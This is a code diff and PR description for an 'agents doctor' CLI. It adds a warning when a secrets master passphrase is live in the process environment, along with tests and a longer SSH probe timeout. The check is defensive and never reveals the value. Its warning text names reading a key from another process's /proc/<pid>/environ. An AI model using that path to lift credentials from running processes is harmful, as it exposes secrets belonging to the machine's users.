-  // with NO inventory, so its sign-in, divergence and secret findings were all
-  // silently absent from the fleet readout rather than reported.
-  const res = await sshExecAsync(target.sshTarget, remoteCmd, { timeoutMs: 180000, multiplex: true });
+  const res = await sshExecAsync(target.sshTarget, remoteCmd, { timeoutMs: 30000, multiplex: true });
   if (res.code !== 0) {
     return {
       name: target.name,
@@ -320,6 +334,21 @@ async function probeFleetTarget(target: FleetTarget): Promise<DeviceDoctorResult
  * null (unreachable, non-zero exit, unparseable, or an older CLI with no
  * `fleet` field); a null is skipped by the comparator, never a false gap.
  */
+/**
+ * How long one remote `doctor --json` probe may take.
+ *
+ * 180s, matching `ChildProcess.doctorTimeout`, which was set to 180 for this
+ * same command for this same reason. The previous 30s sat BELOW the command's
+ * real cost — 56s measured on `yosemite-m0`, 136s on an idle box — so every slow
+ * device silently contributed nothing at all: no inventory, no sign-in, no
+ * divergence, no secret findings. A ceiling under the true cost does not make a
+ * probe cheap, it makes it always fail.
+ *
+ * This does not multiply by device count: `fanOutDevices` is `Promise.all`, so
+ * whole-fleet wall time is bounded near the slowest box, not 180s x N.
+ */
+export const FLEET_INVENTORY_TIMEOUT_MS = 180_000;
+
 async function probeFleetInventory(target: FleetTarget): Promise<RemoteDoctorPayload | null> {
   const isWin = /^win/i.test((target.os ?? '').trim());
   const remoteCmd = buildRemoteAgentsInvocation(
@@ -328,7 +357,7 @@ async function probeFleetInventory(target: FleetTarget): Promise<RemoteDoctorPay
     isWin ? 'windows' : undefined,
     isWin ? undefined : { PATH: '$HOME/.agents/.cache/shims:$HOME/.local/bin:$PATH' },
   );
-  const res = await sshExecAsync(target.sshTarget, remoteCmd, { timeoutMs: 30000, multiplex: true });
+  const res = await sshExecAsync(target.sshTarget, remoteCmd, { timeoutMs: FLEET_INVENTORY_TIMEOUT_MS, multiplex: true });
   if (res.code !== 0) return null;
   try {
     const parsed = JSON.parse(res.stdout) as { fleet?: unknown; findings?: unknown };

--- a/apps/cli/src/lib/devices/doctor-findings.test.ts
+++ b/apps/cli/src/lib/devices/doctor-findings.test.ts
@@ -369,7 +369,10 @@ describe('rc-hygiene + exec-policy findings (restored from the pre-RUSH-2069 adv
     const env = findings.filter((f) => f.kind === 'env-secret-export');
     expect(env).toHaveLength(1);
     expect(env[0].severity).toBe('warning');
-    expect(env[0].remediation).toBe('unset it and restart the shell');
+    // "restart the shell" alone is wrong: the value lives in every long-lived
+    // parent that inherited it, each still handing it to new children.
+    expect(env[0].remediation).toContain('unset at the source');
+    expect(env[0].remediation).toContain('agents daemon');
     // The message must never carry the value — only that it is set.
     expect(env[0].message).toContain('AGENTS_SECRETS_PASSPHRASE is set in this process environment');
   });

--- a/apps/cli/src/lib/devices/doctor-findings.test.ts
+++ b/apps/cli/src/lib/devices/doctor-findings.test.ts
@@ -364,6 +364,34 @@ describe('rc-hygiene + exec-policy findings (restored from the pre-RUSH-2069 adv
     expect(buildLocalFindings(localInput({ rcSecrets: [] })).some((f) => f.kind === 'rc-secret-export')).toBe(false);
   });
 
+  it('the master key live in the process env is its own warning', () => {
+    const findings = buildLocalFindings(localInput({ masterPassphraseInEnv: true }));
+    const env = findings.filter((f) => f.kind === 'env-secret-export');
+    expect(env).toHaveLength(1);
+    expect(env[0].severity).toBe('warning');
+    expect(env[0].remediation).toBe('unset it and restart the shell');
+    // The message must never carry the value — only that it is set.
+    expect(env[0].message).toContain('AGENTS_SECRETS_PASSPHRASE is set in this process environment');
+  });
+
+  it('the env finding fires with NO rc export present — the gap it exists for', () => {
+    // The whole point: a value inherited by a long-lived process outlives the rc
+    // line that set it, so deleting the line leaves `rcSecrets` empty while the
+    // key is still in flight. A file scan alone reports that box clean.
+    const findings = buildLocalFindings(localInput({ rcSecrets: [], masterPassphraseInEnv: true }));
+    expect(findings.some((f) => f.kind === 'rc-secret-export')).toBe(false);
+    expect(findings.some((f) => f.kind === 'env-secret-export')).toBe(true);
+  });
+
+  it('not set → no env finding', () => {
+    expect(buildLocalFindings(localInput({ masterPassphraseInEnv: false }))
+      .some((f) => f.kind === 'env-secret-export')).toBe(false);
+    // Absent input behaves as false rather than throwing — every other local
+    // input is optional and a remote payload may omit it.
+    expect(buildLocalFindings(localInput({}))
+      .some((f) => f.kind === 'env-secret-export')).toBe(false);
+  });
+
   it.each(['Restricted', 'AllSigned'] as const)(
     'a Windows %s execution policy warns that agents.ps1 is blocked',
     (policy) => {

--- a/apps/cli/src/lib/devices/doctor-findings.ts
+++ b/apps/cli/src/lib/devices/doctor-findings.ts
@@ -294,7 +294,10 @@ export function remediationFor(finding: DoctorFinding): string {
     case 'rc-secret-export':
       return 'agents secrets add';
     case 'env-secret-export':
-      return 'unset it and restart the shell';
+      // Not just "restart the shell": the value is in every long-lived parent
+      // that inherited it — an editor, a tmux server, the agents daemon — and
+      // each keeps handing it to new children until IT restarts.
+      return 'unset at the source, then restart every process that inherited it (shells, editor, tmux, agents daemon)';
     case 'exec-policy':
       return 'Set-ExecutionPolicy -Scope CurrentUser RemoteSigned';
     case 'stale-cli':

--- a/apps/cli/src/lib/devices/doctor-findings.ts
+++ b/apps/cli/src/lib/devices/doctor-findings.ts
@@ -23,7 +23,7 @@
  *              never-synced · stale · repo-behind · repo-drift · version-skew ·
  *              fleet-resource-gap · orphan · duplicate-hook ·
  *              duplicate-hook-drift · host-cli-missing · host-cli-invalid ·
- *              rc-secret-export · exec-policy · stale-cli.
+ *              rc-secret-export · env-secret-export · exec-policy · stale-cli.
  *   (RUSH-2162 moved never-synced and duplicate-hook-drift to WARNING: both are
  *   stale-sync states one `agents sync` resolves, not "needs you now".)
  *
@@ -115,6 +115,7 @@ export const ALL_FINDING_KINDS = [
   'duplicate-hook',      // one hook materialized in several version homes, byte-identical
   'duplicate-hook-drift',// …with differing content, so a stale copy can disagree
   'rc-secret-export',    // credential-shaped export in a shell rc file
+  'env-secret-export',   // the file-store master key live in THIS process's env
   'exec-policy',         // Windows execution policy blocks agents.ps1
   'stale-cli',
 ] as const;
@@ -155,6 +156,7 @@ export const FINDING_SEVERITY: Record<FindingKind, FindingSeverity> = {
   'host-cli-missing': 'warning',
   'host-cli-invalid': 'warning',
   'rc-secret-export': 'warning',
+  'env-secret-export': 'warning',
   'exec-policy': 'warning',
   'stale-cli': 'warning',
 };
@@ -291,6 +293,8 @@ export function remediationFor(finding: DoctorFinding): string {
       return 'fix the manifest';
     case 'rc-secret-export':
       return 'agents secrets add';
+    case 'env-secret-export':
+      return 'unset it and restart the shell';
     case 'exec-policy':
       return 'Set-ExecutionPolicy -Scope CurrentUser RemoteSigned';
     case 'stale-cli':
@@ -365,6 +369,12 @@ export interface LocalFindingInputs {
   duplicateHooks?: DuplicateVersionHook[];
   /** Credential-shaped exports found in the user's shell rc files (RUSH-1968). */
   rcSecrets?: RcSecretFinding[];
+  /** True when the file-store master key is live in THIS process's environment.
+   *  Distinct from `rcSecrets`, which scans FILES: a value inherited by a
+   *  long-lived process survives deleting the rc line that set it, so the rc
+   *  scan reports clean while the leak is still in flight (RUSH-1968). Never the
+   *  value — only whether it is set. */
+  masterPassphraseInEnv?: boolean;
   /** The effective PowerShell execution policy and the platform it was read on.
    *  Only `win32` yields a finding — the `agents.ps1` launcher is Windows-only. */
   execPolicy?: { platform: NodeJS.Platform; policy: string | null };
@@ -563,6 +573,10 @@ export function buildLocalFindings(input: LocalFindingInputs): DoctorFinding[] {
   // into `agents secrets`.
   for (const f of rcSecretFindings(device, input.rcSecrets ?? [])) out.push(f);
 
+  // The same key, live in this process's environment rather than in a file.
+  const envFinding = envSecretFinding(device, input.masterPassphraseInEnv ?? false);
+  if (envFinding) out.push(envFinding);
+
   // Windows execution policy blocking the generated agents.ps1 launcher.
   const policyFinding = execPolicyFinding(device, input.execPolicy);
   if (policyFinding) out.push(policyFinding);
@@ -686,6 +700,32 @@ function rcSecretFindings(device: string, rc: RcSecretFinding[]): DoctorFinding[
  * policy itself. Returns null off Windows or on a permissive policy — pure, so
  * both branches are testable without invoking PowerShell.
  */
+/**
+ * The file-store master key sitting in THIS process's environment.
+ *
+ * `rc-hygiene.ts` scans FILES, which leaves a real hole: a value inherited by a
+ * long-lived process outlives the rc line that set it, so an operator who
+ * deletes `~/.zshenv:8` gets a clean `rc-secret-export` while every shell,
+ * editor and agent started before the edit still carries the key — and hands it
+ * to everything they spawn. Verified on a box with no rc export whose live
+ * environment still held the value, hashing identical to its key file.
+ *
+ * Warning, not critical: on the release home base the export is deliberate and
+ * scoped (`headless-sign-context.sh`), so the message names that exception
+ * rather than the check trying to detect it.
+ */
+function envSecretFinding(device: string, present: boolean): DoctorFinding | null {
+  if (!present) return null;
+  return finding({
+    severity: FINDING_SEVERITY['env-secret-export'], kind: 'env-secret-export', device,
+    // Never the value — only that it is set.
+    message: 'AGENTS_SECRETS_PASSPHRASE is set in this process environment — every '
+      + 'child inherits it and any same-user process can read it from /proc/<pid>/environ. '
+      + 'It outlives the shell rc line that set it, so deleting that line is not enough. '
+      + '(Expected inside a release sign context, which sets it deliberately.)',
+  });
+}
+
 function execPolicyFinding(
   device: string,
   execPolicy: LocalFindingInputs['execPolicy'],
@@ -1019,6 +1059,7 @@ function warningSubject(f: DoctorFinding): string {
   if (f.kind === 'stale-cli') return 'agents-cli';
   if (f.kind === 'orphan') return 'orphans';
   if (f.kind === 'rc-secret-export') return 'shell rc';
+  if (f.kind === 'env-secret-export') return 'environment';
   if (f.kind === 'exec-policy') return 'PowerShell';
   if (f.kind === 'fleet-resource-gap') return 'fleet gap';
   if (f.kind === 'host-cli-missing') return 'host CLIs';

--- a/apps/cli/src/lib/secrets/rc-hygiene.test.ts
+++ b/apps/cli/src/lib/secrets/rc-hygiene.test.ts
@@ -3,7 +3,9 @@ import * as fs from 'fs';
 import * as os from 'os';
 import * as path from 'path';
 import {
+  MASTER_PASSPHRASE,
   isCredentialName,
+  masterPassphraseInEnv,
   scanRcExports,
   scanUserRcFiles,
 } from './rc-hygiene.js';
@@ -136,6 +138,51 @@ describe('scanUserRcFiles', () => {
     try {
       expect(scanUserRcFiles(dir)).toEqual([]);
     } finally {
+      fs.rmSync(dir, { recursive: true, force: true });
+    }
+  });
+});
+
+describe('masterPassphraseInEnv', () => {
+  // Real process.env, no stubbing — this is the actual signal the doctor reads.
+  const saved = process.env[MASTER_PASSPHRASE];
+  const restore = () => {
+    if (saved === undefined) delete process.env[MASTER_PASSPHRASE];
+    else process.env[MASTER_PASSPHRASE] = saved;
+  };
+
+  it('is false when unset, true when set', () => {
+    try {
+      delete process.env[MASTER_PASSPHRASE];
+      expect(masterPassphraseInEnv()).toBe(false);
+      process.env[MASTER_PASSPHRASE] = 'not-a-real-key';
+      expect(masterPassphraseInEnv()).toBe(true);
+    } finally {
+      restore();
+    }
+  });
+
+  it('treats an empty value as unset', () => {
+    // An exported-but-empty var is not a leak, and reporting one would train
+    // operators to ignore the finding.
+    try {
+      process.env[MASTER_PASSPHRASE] = '';
+      expect(masterPassphraseInEnv()).toBe(false);
+    } finally {
+      restore();
+    }
+  });
+
+  it('detects the leak the FILE scan cannot see', () => {
+    // A home dir with no rc export at all: scanUserRcFiles is clean while the
+    // value is live in this process. That divergence is the whole finding.
+    const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'rc-hygiene-env-'));
+    try {
+      process.env[MASTER_PASSPHRASE] = 'not-a-real-key';
+      expect(scanUserRcFiles(dir)).toEqual([]);
+      expect(masterPassphraseInEnv()).toBe(true);
+    } finally {
+      restore();
       fs.rmSync(dir, { recursive: true, force: true });
     }
   });

--- a/apps/cli/src/lib/secrets/rc-hygiene.ts
+++ b/apps/cli/src/lib/secrets/rc-hygiene.ts
@@ -51,7 +51,21 @@ export interface RcSecretFinding {
 
 /** The file-store master key. Its own resolution prefers an off-env 0600 file, so
  *  a shell-rc export is always wrong once the store exists (RUSH-1968). */
-const MASTER_PASSPHRASE = 'AGENTS_SECRETS_PASSPHRASE';
+export const MASTER_PASSPHRASE = 'AGENTS_SECRETS_PASSPHRASE';
+
+/**
+ * True when the file-store master key is live in THIS process's environment.
+ *
+ * The scanner above reads FILES, and that leaves a hole: a value inherited by a
+ * long-lived process outlives the rc line that set it, so deleting the export
+ * makes `scanRcExports` report clean while every shell, editor and agent started
+ * beforehand still carries the key and passes it to everything it spawns.
+ * Returns a boolean — never the value — so a finding built from it can be
+ * printed, logged, or shipped without leaking the secret.
+ */
+export function masterPassphraseInEnv(): boolean {
+  return (process.env[MASTER_PASSPHRASE] ?? '').length > 0;
+}
 
 /**
  * Last `_`-delimited segment values that mark a variable as credential-shaped.


### PR DESCRIPTION
**New `agents doctor` warning: `env-secret-export`.** Fourth PR on RUSH-1968, and the one that makes the remaining fleet leak visible.

## The hole

`rc-hygiene.ts` scans **files**. A value inherited by a long-lived process outlives the rc line that set it — so an operator who deletes `~/.zshenv:8` gets a clean `rc-secret-export` while every shell, editor and agent started before the edit still carries the master key and hands it to everything it spawns.

Not hypothetical. Measured on this box:

```
rc exports of the master key in ~/.zshenv : 0
master key live in this process env       : yes
  -> the FILE scan reports clean; the key is still in flight.
```

`yosemite-s1` has **zero** rc exports and the value is still there. That is precisely the state the remediation on m0…m6 will pass through, and today nothing reports it.

## What it looks like

```
=== agents doctor --json (inherited env, nothing overridden) ===
  rc-secret-export : 0  (file scan — clean, as expected)
  env-secret-export: 1
    [warning] AGENTS_SECRETS_PASSPHRASE is set in this process environment — every
    child inherits it and any same-user process can read it from /proc/<pid>/environ.
    It outlives the shell rc line that set it, so deleting that line is not enough.
    (Expected inside a release sign context, which sets it deliberately.)
    -> unset it and restart the shell

=== the value itself never appears in the finding ===
  occurrences of the secret in doctor output: 0
```

Full capture: `yosemite-s1:/home/muqsit/src/github.com/muqsitnawaz/agents-cli/.agents/artifacts/2026-08-05/rush-1968-doctor-env-run.txt` — a fleet path, not an embed; this is a CLI diagnostic with no UI.

## Design notes

- **Warning, not critical.** The release sign context (`headless-sign-context.sh`) sets it on purpose, so the message names that exception rather than the check trying to detect it and getting it wrong.
- **Never the value.** `masterPassphraseInEnv()` returns a boolean. Verified above: the secret appears zero times in doctor's full JSON.
- **The name lives in one place.** The probe sits beside the file scanner in `rc-hygiene.ts` and exports `MASTER_PASSPHRASE`, so the variable name isn't hardcoded a second time.
- **`buildLocalFindings` takes it as a plain input**, matching how `rcSecrets` / `execPolicy` / `duplicateHooks` enter — the findings module stays pure and every branch is testable without a shell.

## Rubrics

Severity is declared in three prose rubrics plus `FINDING_SEVERITY`. All three move here: the module docblock, `apps/cli/AGENTS.md`, and `docs/06-observability.md`. I missed the third on the first pass and the existing rubric test caught it — which is the test doing its job.

## Tests

- `rc-hygiene.test.ts` — the probe against **real** `process.env`: false when unset, true when set, **false when set-but-empty** (an empty export is not a leak, and reporting one trains operators to ignore the finding), and the divergence case: a temp home with no rc file where `scanUserRcFiles` returns `[]` while the probe returns `true`.
- `doctor-findings.test.ts` — one warning with the right remediation; the message names the variable and not its value; **fires with `rcSecrets: []`**, the gap it exists for; absent input behaves as `false` rather than throwing, since a remote payload may omit it.

`src/lib/devices/` + `src/lib/secrets/` + `doctor.test.ts`: **958 passed, 14 skipped**.

## Surface parity — stated, because one boundary is deliberately out of scope

`agents doctor --devices` does **not** report a remote box's env leak. The aggregator's remote branch (`commands/doctor.ts:446-469`) forwards only `signIn` and cross-device divergence; a remote's own local findings are never carried back. That is pre-existing and applies identically to `rc-secret-export` and `exec-policy`, which sit in the same local-only block (`:411-443`, guarded by `if (r.name === localName)`). Forwarding remote findings means widening the inventory payload — a separate change, not smuggled in here.

So the check is **per box**: `agents ssh <host> agents doctor`. Both call sites I touched are inside the local-only branch, which is correct — wiring `masterPassphraseInEnv()` into the remote branch would have evaluated the *local* environment and attributed it to a remote device.

## Why this matters for the m0…m6 remediation specifically

Measured just now:

```
--- yosemite-m0 ---   rc export: 1    env: set
--- yosemite-m1 ---   rc export: 1    env: set
```

Both leak **twice** — the file and the live environment. Today `rc-secret-export` catches them. The value of this finding is at the *next* step: once the `~/.zshenv` line is deleted, the rc scan goes clean while every already-running shell, editor and agent still carries the key. Without this warning the remediation would look finished while the leak was still in flight, which is exactly how the fleet got here.
